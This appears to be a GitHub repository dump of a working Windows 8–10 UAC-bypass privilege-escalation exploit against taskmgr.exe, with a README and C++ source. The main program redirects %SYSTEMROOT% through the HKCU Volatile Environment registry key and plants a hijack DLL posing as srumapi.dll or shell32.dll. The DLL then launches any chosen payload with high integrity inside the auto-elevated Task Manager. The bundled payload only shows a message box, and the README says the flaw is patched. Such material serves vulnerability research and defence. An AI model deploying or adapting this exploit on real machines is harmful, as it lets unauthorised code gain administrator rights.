├── .gitignore ├── ExamplePayload ├── Payload.cpp ├── Payload.exe └── Readme.txt ├── LICENSE.md ├── README.md ├── TaskMgrInject ├── TaskMgrInject.cpp ├── TaskMgrInject.vcxproj └── TaskMgrInject.vcxproj.filters ├── TaskMgrVolatileEnvironmentLPE.sln └── TaskMgrVolatileEnvironmentLPE ├── TaskMgrVolatileEnvironmentLPE.cpp ├── TaskMgrVolatileEnvironmentLPE.vcxproj └── TaskMgrVolatileEnvironmentLPE.vcxproj.filters /.gitignore: -------------------------------------------------------------------------------- 1 | .vs/ 2 | bin/ 3 | obj/ 4 | Debug/ 5 | Release/ 6 | ipch/ 7 | TestResults/ 8 | *.suo 9 | *.user 10 | *.sdf 11 | *.opensdf 12 | *.opendb 13 | *.VC.db 14 | *.aps 15 | [Tt]humbs.db 16 | *~*.xlsx 17 | *~*.docx 18 | 19 | $Build/ -------------------------------------------------------------------------------- /ExamplePayload/Payload.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ╓──────────────────────────────────────────────────────────────────────────────────────╖ 3 | * ║ ║ 4 | * ║ Pentest Mini Framework ║ 5 | * ║ (Lightweight penetration testing framework) ║ 6 | * ║ ║ 7 | * ║ Copyright (c) 2017, bytecode77 ║ 8 | * ║ All rights reserved. ║ 9 | * ║ ║ 10 | * ║ Version 0.5.3 ║ 11 | * ║ https://bytecode77.com/hacking/libraries/pentest-mini-framework ║ 12 | * ║ ║ 13 | * ╟──────────────────────────────────────────────────────────────────────────────────────╢ 14 | * ║ ║ 15 | * ║ Redistribution and use in source and binary forms, with or without ║ 16 | * ║ modification, are permitted provided that the following conditions are met: ║ 17 | * ║ ║ 18 | * ║ * Redistributions of source code must retain the above copyright notice, this ║ 19 | * ║ list of conditions and the following disclaimer. ║ 20 | * ║ ║ 21 | * ║ * Redistributions in binary form must reproduce the above copyright notice, this ║ 22 | * ║ list of conditions and the following disclaimer in the documentation and/or ║ 23 | * ║ other materials provided with the distribution. ║ 24 | * ║ ║ 25 | * ║ THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ║ 26 | * ║ ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED ║ 27 | * ║ WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE ║ 28 | * ║ DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ║ 29 | * ║ ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES ║ 30 | * ║ (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; ║ 31 | * ║ LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ║ 32 | * ║ ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT ║ 33 | * ║ (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS ║ 34 | * ║ SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. ║ 35 | * ║ ║ 36 | * ╙──────────────────────────────────────────────────────────────────────────────────────╜ 37 | */ 38 | 39 | #include "..\PentestMiniFramework\PentestMiniFramework.h" 40 | 41 | int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) 42 | { 43 | DWORD integrityLevel; 44 | wstring integrityLevelName; 45 | Process::GetCurrent().getIntegrity(integrityLevel, integrityLevelName); 46 | 47 | wstring commandLine = L""; 48 | vector args = Application::GetCommandLineArgs(); 49 | if (args.size() <= 1) 50 | { 51 | commandLine = L" (none)\r\n"; 52 | } 53 | else 54 | { 55 | commandLine += L"\r\n"; 56 | for (int i = 1; i < (int)args.size(); i++) 57 | { 58 | commandLine += L"[" + Convert::ToString(i) + L"] = " + args[i] + L"\r\n"; 59 | } 60 | } 61 | 62 | Message::Information 63 | ( 64 | L"Example Payload", 65 | L"Path: " + File::GetExecutablePath() + L"\r\n" + 66 | L"CommandLine:" + commandLine + L"\r\n" + 67 | L"PID: " + Convert::ToString(GetCurrentProcessId()) + L"\r\n" + 68 | L"Integrity Level: 0x" + Convert::ToString(integrityLevel, 16) + L"\r\n" + 69 | L"Integrity: " + integrityLevelName + L"\r\n" + 70 | L"User: " + System::GetCurrentUser() 71 | ); 72 | 73 | return 0; 74 | } -------------------------------------------------------------------------------- /ExamplePayload/Payload.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/bytecode77/taskmgr-privilege-escalation/9e31ad212bc2e1ad99563cad3277d5dac040d124/ExamplePayload/Payload.exe -------------------------------------------------------------------------------- /ExamplePayload/Readme.txt: -------------------------------------------------------------------------------- 1 | Payload.exe displays a MessageBox with basic executable information, especially 2 | integrity level. It is part of my 'Pentest Mini Framework' and not relevant to 3 | the exploit itself. -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | Copyright (c) 2017, bytecode77 2 | All rights reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without 5 | modification, are permitted provided that the following conditions are met: 6 | 7 | * Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | * Redistributions in binary form must reproduce the above copyright notice, this 11 | list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 15 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 16 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 17 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 18 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 19 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 20 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 21 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 22 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 23 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # TaskMgr Volatile Environment LPE 2 | 3 | | Exploit Information | | 4 | |:------------------- |:--------------------------------- | 5 | | Date | 28.10.2017 | 6 | | Patched | Windows 10 RS3 (16299) | 7 | | Tested on | Windows 8-10, x86 and x64 | 8 | 9 | ## Description 10 | 11 | In taskmgr.exe, there is a DLL loading vulnerability that can be exploited by injecting an environment variable. 12 | 13 | A load attempt to %SYSTEMROOT%\System32\srumapi.dll and various other DLL's will be performed from this auto-elevated process on Windows 10. In Windows 8, shell32.dll will be loaded. 14 | 15 | Redirecting %SYSTEMROOT% can be achieved through Volatile Environment. For this, we set HKEY_CURRENT_USER\Volatile Environment\SYSTEMROOT to a new directory, which we then populate with our hijacked payload DLL, along with *.clb files from C:\Windows\Registration as they are loaded from our new directory as well. 16 | 17 | Then, as we execute taskmgr.exe, it will load our payload DLL and on Windows 8 it will also load the COM+ components. We need to copy those, too, because the process will otherwise crash. I have included them for Windows 10, too, even though they are not currently required. 18 | 19 | Our DLL is now executed with high IL. In this example, Payload.exe will be started, which is an exemplary payload file displaying a MessageBox. 20 | 21 | ## Expected Result 22 | 23 | When everything worked correctly, Payload.exe should be executed, displaying basic information including integrity level. 24 | 25 | ![](https://bytecode77.com/images/pages/taskmgr-privilege-escalation/result.webp) 26 | 27 | ## Downloads 28 | 29 | Compiled binaries with example payload: 30 | 31 | [![](http://bytecode77.com/public/fileicons/zip.png) TaskMgrVolatileEnvironmentLPE.zip](https://downloads.bytecode77.com/TaskMgrVolatileEnvironmentLPE.zip) 32 | (**ZIP Password:** bytecode77) 33 | 34 | ## Project Page 35 | 36 | [![](https://bytecode77.com/public/favicon16.png) bytecode77.com/taskmgr-privilege-escalation](https://bytecode77.com/taskmgr-privilege-escalation) -------------------------------------------------------------------------------- /TaskMgrInject/TaskMgrInject.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | using namespace std; 4 | 5 | void DeleteRegistryValue(HKEY key, wstring path, wstring name); 6 | wstring GetTempFolderPath(); 7 | 8 | bool WINAPI DllMain(HINSTANCE hInstDll, DWORD fdwReason, LPVOID lpvReserved) 9 | { 10 | if (fdwReason == DLL_PROCESS_ATTACH) 11 | { 12 | // We now run in taskmgr.exe with high IL 13 | 14 | // Restore %SYSTEMROOT% immediately 15 | DeleteRegistryValue(HKEY_CURRENT_USER, L"Volatile Environment", L"SYSTEMROOT"); 16 | 17 | // Execute Payload.exe 18 | // Basically, any payload can be implemented from here on and it doesn't necessarily have to be a separate executable 19 | // If you can guarantee stability within *this* context, you can also just write down your payload here... 20 | CreateProcessW((GetTempFolderPath() + L"\\TaskMgrVolatileEnvironmentLPE\\Payload.exe").c_str(), NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &STARTUPINFOW(), &PROCESS_INFORMATION()); 21 | 22 | // Managed task, thx, cu -> 23 | ExitProcess(0); 24 | 25 | // Unfortunate side effect: Task Manager will loose the current view state, so the user has to click the "More details" button 26 | // to get the "full" view back, similarly as when Task Manager crashes. 27 | } 28 | 29 | return true; 30 | } 31 | 32 | 33 | 34 | void DeleteRegistryValue(HKEY key, wstring path, wstring name) 35 | { 36 | HKEY hKey; 37 | 38 | if (RegOpenKeyExW(key, path.c_str(), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS && hKey != NULL) 39 | { 40 | RegDeleteValueW(hKey, name.c_str()); 41 | RegCloseKey(hKey); 42 | } 43 | } 44 | wstring GetTempFolderPath() 45 | { 46 | wchar_t path[MAX_PATH]; 47 | GetTempPathW(MAX_PATH, path); 48 | return wstring(path); 49 | } -------------------------------------------------------------------------------- /TaskMgrInject/TaskMgrInject.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {0B607037-8125-4D9D-88BB-B19C1658F070} 24 | TaskMgrInject 25 | 10.0.15063.0 26 | 27 | 28 | 29 | DynamicLibrary 30 | true 31 | v141 32 | MultiByte 33 | 34 | 35 | DynamicLibrary 36 | false 37 | v141 38 | true 39 | MultiByte 40 | 41 | 42 | DynamicLibrary 43 | true 44 | v141 45 | MultiByte 46 | 47 | 48 | DynamicLibrary 49 | false 50 | v141 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | Disabled 77 | true 78 | MultiThreadedDebug 79 | true 80 | false 81 | 82 | 83 | mkdir "$(SolutionDir)$Release" 84 | mkdir "$(SolutionDir)$Release\$(PlatformShortName)" 85 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 86 | 87 | 88 | 89 | 90 | Level3 91 | Disabled 92 | true 93 | MultiThreadedDebug 94 | true 95 | false 96 | 97 | 98 | mkdir "$(SolutionDir)$Release" 99 | mkdir "$(SolutionDir)$Release\$(PlatformShortName)" 100 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 101 | 102 | 103 | 104 | 105 | Level3 106 | MaxSpeed 107 | true 108 | true 109 | true 110 | MultiThreaded 111 | true 112 | 113 | 114 | true 115 | true 116 | 117 | 118 | mkdir "$(SolutionDir)$Release" 119 | mkdir "$(SolutionDir)$Release\$(PlatformShortName)" 120 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 121 | 122 | 123 | 124 | 125 | Level3 126 | MaxSpeed 127 | true 128 | true 129 | true 130 | MultiThreaded 131 | true 132 | 133 | 134 | true 135 | true 136 | 137 | 138 | mkdir "$(SolutionDir)$Release" 139 | mkdir "$(SolutionDir)$Release\$(PlatformShortName)" 140 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 141 | 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | -------------------------------------------------------------------------------- /TaskMgrInject/TaskMgrInject.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /TaskMgrVolatileEnvironmentLPE.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.26730.16 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TaskMgrVolatileEnvironmentLPE", "TaskMgrVolatileEnvironmentLPE\TaskMgrVolatileEnvironmentLPE.vcxproj", "{DE10FC29-F059-4B39-8483-93142DEDE202}" 7 | ProjectSection(ProjectDependencies) = postProject 8 | {0B607037-8125-4D9D-88BB-B19C1658F070} = {0B607037-8125-4D9D-88BB-B19C1658F070} 9 | EndProjectSection 10 | EndProject 11 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TaskMgrInject", "TaskMgrInject\TaskMgrInject.vcxproj", "{0B607037-8125-4D9D-88BB-B19C1658F070}" 12 | EndProject 13 | Global 14 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 15 | Debug|x64 = Debug|x64 16 | Debug|x86 = Debug|x86 17 | Release|x64 = Release|x64 18 | Release|x86 = Release|x86 19 | EndGlobalSection 20 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 21 | {DE10FC29-F059-4B39-8483-93142DEDE202}.Debug|x64.ActiveCfg = Debug|x64 22 | {DE10FC29-F059-4B39-8483-93142DEDE202}.Debug|x64.Build.0 = Debug|x64 23 | {DE10FC29-F059-4B39-8483-93142DEDE202}.Debug|x86.ActiveCfg = Debug|Win32 24 | {DE10FC29-F059-4B39-8483-93142DEDE202}.Debug|x86.Build.0 = Debug|Win32 25 | {DE10FC29-F059-4B39-8483-93142DEDE202}.Release|x64.ActiveCfg = Release|x64 26 | {DE10FC29-F059-4B39-8483-93142DEDE202}.Release|x64.Build.0 = Release|x64 27 | {DE10FC29-F059-4B39-8483-93142DEDE202}.Release|x86.ActiveCfg = Release|Win32 28 | {DE10FC29-F059-4B39-8483-93142DEDE202}.Release|x86.Build.0 = Release|Win32 29 | {0B607037-8125-4D9D-88BB-B19C1658F070}.Debug|x64.ActiveCfg = Debug|x64 30 | {0B607037-8125-4D9D-88BB-B19C1658F070}.Debug|x64.Build.0 = Debug|x64 31 | {0B607037-8125-4D9D-88BB-B19C1658F070}.Debug|x86.ActiveCfg = Debug|Win32 32 | {0B607037-8125-4D9D-88BB-B19C1658F070}.Debug|x86.Build.0 = Debug|Win32 33 | {0B607037-8125-4D9D-88BB-B19C1658F070}.Release|x64.ActiveCfg = Release|x64 34 | {0B607037-8125-4D9D-88BB-B19C1658F070}.Release|x64.Build.0 = Release|x64 35 | {0B607037-8125-4D9D-88BB-B19C1658F070}.Release|x86.ActiveCfg = Release|Win32 36 | {0B607037-8125-4D9D-88BB-B19C1658F070}.Release|x86.Build.0 = Release|Win32 37 | EndGlobalSection 38 | GlobalSection(SolutionProperties) = preSolution 39 | HideSolutionNode = FALSE 40 | EndGlobalSection 41 | GlobalSection(ExtensibilityGlobals) = postSolution 42 | SolutionGuid = {FAC528A7-6914-4A3C-8433-E2979580BB85} 43 | EndGlobalSection 44 | EndGlobal 45 | -------------------------------------------------------------------------------- /TaskMgrVolatileEnvironmentLPE/TaskMgrVolatileEnvironmentLPE.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | * ╓──────────────────────────────────────────────────────────────────────────────────────╖ 3 | * ║ ║ 4 | * ║ TaskMgr Volatile Environment UAC Bypass Local Privilege Escalation ║ 5 | * ║ ║ 6 | * ║ Discovered by bytecode77 (https://bytecode77.com) ║ 7 | * ║ ║ 8 | * ║ Full Download: ║ 9 | * ║ https://bytecode77.com/taskmgr-privilege-escalation ║ 10 | * ║ ║ 11 | * ╟──────────────────────────────────────────────────────────────────────────────────────╢ 12 | * ║ ║ 13 | * ║ In taskmgr.exe, there is a DLL loading vulnerability that can be exploited by ║ 14 | * ║ injecting an environment variable. ║ 15 | * ║ ║ 16 | * ║ A load attempt to %SYSTEMROOT%\System32\srumapi.dll and various other DLL's will ║ 17 | * ║ be performed from this auto-elevated process on Windows 10. In Windows 8, ║ 18 | * ║ shell32.dll will be loaded. ║ 19 | * ║ ║ 20 | * ║ Redirecting %SYSTEMROOT% can be achieved through Volatile Environment. For this, ║ 21 | * ║ we set HKEY_CURRENT_USER\Volatile Environment\SYSTEMROOT to a new directory, ║ 22 | * ║ which we then populate with our hijacked payload DLL, along with *.clb files ║ 23 | * ║ from C:\Windows\Registration as they are loaded from our new directory as well. ║ 24 | * ║ ║ 25 | * ║ Then, as we execute taskmgr.exe, it will load our payload DLL and on Windows 8 ║ 26 | * ║ it will also load the COM+ components. We need to copy those, too, because ║ 27 | * ║ the process will otherwise crash. I have included them for Windows 10, too, even ║ 28 | * ║ though they are not currently required. ║ 29 | * ║ ║ 30 | * ║ Our DLL is now executed with high IL. In this example, Payload.exe will be ║ 31 | * ║ started, which is an exemplary payload file displaying a MessageBox. ║ 32 | * ║ ║ 33 | * ╙──────────────────────────────────────────────────────────────────────────────────────╜ 34 | */ 35 | 36 | #include 37 | #include 38 | #include 39 | using namespace std; 40 | 41 | #pragma comment(lib, "netapi32.lib") 42 | 43 | void SetRegistryValue(HKEY key, wstring path, wstring name, wstring value); 44 | wstring GetTempFolderPath(); 45 | wstring GetStartupPath(); 46 | bool GetWindowsVersion(DWORD &major, DWORD &minor); 47 | 48 | int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) 49 | { 50 | // Prepare our working directory that is later assigned to %SYSTEMROOT% through volatile environment 51 | // We will also use it to put Payload.exe there - Just an example file, can be any arbitrary executable 52 | wstring systemRoot = GetTempFolderPath() + L"\\TaskMgrVolatileEnvironmentLPE"; 53 | CreateDirectoryW(systemRoot.c_str(), NULL); 54 | CreateDirectoryW((systemRoot + L"\\System32").c_str(), NULL); 55 | CreateDirectoryW((systemRoot + L"\\Registration").c_str(), NULL); 56 | 57 | // Copy all *.clb files from %SYSTEMROOT%\Registration to our new location as they are loaded from there 58 | // This doesn't seem to be required for Windows 10 Task Manager, however, we still include them to avoid reliability issues 59 | WIN32_FIND_DATAW findFileData; 60 | HANDLE hFind = FindFirstFileW(L"C:\\Windows\\Registration\\*.clb", &findFileData); 61 | if (hFind != INVALID_HANDLE_VALUE) 62 | { 63 | do 64 | { 65 | CopyFileW((L"C:\\Windows\\Registration\\" + wstring(findFileData.cFileName)).c_str(), (systemRoot + L"\\Registration\\" + findFileData.cFileName).c_str(), FALSE); 66 | } 67 | while (FindNextFileW(hFind, &findFileData)); 68 | FindClose(hFind); 69 | } 70 | 71 | DWORD major, minor; 72 | GetWindowsVersion(major, minor); 73 | 74 | // Windows 10, or above? ;) 75 | if (major >= 10) 76 | { 77 | // This is our DLL that is loaded and then executed as "srumapi.dll" for Windows 10 78 | CopyFileW((GetStartupPath() + L"\\TaskMgrInject.dll").c_str(), (systemRoot + L"\\System32\\srumapi.dll").c_str(), FALSE); 79 | } 80 | // Windows 8 and 8.1 81 | else if (major == 6 && minor >= 2) 82 | { 83 | // This is our DLL that is loaded and then executed as "shell32.dll" for Windows 8 84 | CopyFileW((GetStartupPath() + L"\\TaskMgrInject.dll").c_str(), (systemRoot + L"\\System32\\shell32.dll").c_str(), FALSE); 85 | } 86 | // Windows 7 87 | else 88 | { 89 | // I didn't find any suitable DLL name for Windows 7... 90 | return 0; 91 | } 92 | 93 | // This is our payload. It can be any executable, but for now we just display a MessageBox with basic information and IL 94 | CopyFileW((GetStartupPath() + L"\\Payload.exe").c_str(), (systemRoot + L"\\Payload.exe").c_str(), FALSE); 95 | 96 | // HKEY_CURRENT_USER\Volatile Environment\SYSTEMROOT 97 | // -> This registry value will redirect some DLL loading attempts to the directory we just prepared 98 | SetRegistryValue(HKEY_CURRENT_USER, L"Volatile Environment", L"SYSTEMROOT", systemRoot); 99 | 100 | // Execute taskmgr.exe 101 | // Continue reading in TaskMgrInject.cpp 102 | ShellExecuteW(NULL, L"open", L"taskmgr.exe", NULL, NULL, SW_SHOWNORMAL); 103 | return 0; 104 | } 105 | 106 | 107 | 108 | void SetRegistryValue(HKEY key, wstring path, wstring name, wstring value) 109 | { 110 | HKEY hKey; 111 | 112 | if (RegOpenKeyExW(key, path.c_str(), 0, KEY_ALL_ACCESS, &hKey) == ERROR_SUCCESS && hKey != NULL) 113 | { 114 | RegSetValueExW(hKey, name.c_str(), 0, REG_SZ, (BYTE*)value.c_str(), ((DWORD)wcslen(value.c_str()) + 1) * sizeof(wchar_t)); 115 | RegCloseKey(hKey); 116 | } 117 | } 118 | wstring GetTempFolderPath() 119 | { 120 | wchar_t path[MAX_PATH]; 121 | GetTempPathW(MAX_PATH, path); 122 | return wstring(path); 123 | } 124 | wstring GetStartupPath() 125 | { 126 | wchar_t path[MAX_PATH]; 127 | GetModuleFileNameW(NULL, path, MAX_PATH); 128 | wstring pathStr = wstring(path); 129 | return pathStr.substr(0, pathStr.find_last_of(L"/\\")); 130 | } 131 | bool GetWindowsVersion(DWORD &major, DWORD &minor) 132 | { 133 | LPBYTE rawData = NULL; 134 | if (NetWkstaGetInfo(NULL, 100, &rawData) == NERR_Success) 135 | { 136 | WKSTA_INFO_100* workstationInfo = (WKSTA_INFO_100*)rawData; 137 | major = workstationInfo->wki100_ver_major; 138 | minor = workstationInfo->wki100_ver_minor; 139 | NetApiBufferFree(rawData); 140 | return true; 141 | } 142 | else 143 | { 144 | return false; 145 | } 146 | } -------------------------------------------------------------------------------- /TaskMgrVolatileEnvironmentLPE/TaskMgrVolatileEnvironmentLPE.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 15.0 23 | {DE10FC29-F059-4B39-8483-93142DEDE202} 24 | TaskMgrVolatileEnvironmentLPE 25 | 10.0.15063.0 26 | 27 | 28 | 29 | Application 30 | true 31 | v141 32 | MultiByte 33 | 34 | 35 | Application 36 | false 37 | v141 38 | true 39 | MultiByte 40 | 41 | 42 | Application 43 | true 44 | v141 45 | MultiByte 46 | 47 | 48 | Application 49 | false 50 | v141 51 | true 52 | MultiByte 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | Level3 76 | Disabled 77 | true 78 | MultiThreadedDebug 79 | true 80 | false 81 | 82 | 83 | mkdir "$(SolutionDir)$Release" 84 | mkdir "$(SolutionDir)$Release\$(PlatformShortName)" 85 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 86 | 87 | 88 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 89 | xcopy /Y "$(SolutionDir)ExamplePayload\Payload.exe" "$(SolutionDir)$Release\$(PlatformShortName)" 90 | 91 | 92 | 93 | 94 | Level3 95 | Disabled 96 | true 97 | MultiThreadedDebug 98 | true 99 | false 100 | 101 | 102 | mkdir "$(SolutionDir)$Release" 103 | mkdir "$(SolutionDir)$Release\$(PlatformShortName)" 104 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 105 | 106 | 107 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 108 | xcopy /Y "$(SolutionDir)ExamplePayload\Payload.exe" "$(SolutionDir)$Release\$(PlatformShortName)" 109 | 110 | 111 | 112 | 113 | Level3 114 | MaxSpeed 115 | true 116 | true 117 | true 118 | MultiThreaded 119 | true 120 | 121 | 122 | true 123 | true 124 | 125 | 126 | mkdir "$(SolutionDir)$Release" 127 | mkdir "$(SolutionDir)$Release\$(PlatformShortName)" 128 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 129 | 130 | 131 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 132 | xcopy /Y "$(SolutionDir)ExamplePayload\Payload.exe" "$(SolutionDir)$Release\$(PlatformShortName)" 133 | 134 | 135 | 136 | 137 | Level3 138 | MaxSpeed 139 | true 140 | true 141 | true 142 | MultiThreaded 143 | true 144 | 145 | 146 | true 147 | true 148 | 149 | 150 | mkdir "$(SolutionDir)$Release" 151 | mkdir "$(SolutionDir)$Release\$(PlatformShortName)" 152 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 153 | 154 | 155 | xcopy /Y "$(TargetPath)" "$(SolutionDir)$Release\$(PlatformShortName)" 156 | xcopy /Y "$(SolutionDir)ExamplePayload\Payload.exe" "$(SolutionDir)$Release\$(PlatformShortName)" 157 | 158 | 159 | 160 | 161 | 162 | 163 | 164 | 165 | -------------------------------------------------------------------------------- /TaskMgrVolatileEnvironmentLPE/TaskMgrVolatileEnvironmentLPE.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | --------------------------------------------------------------------------------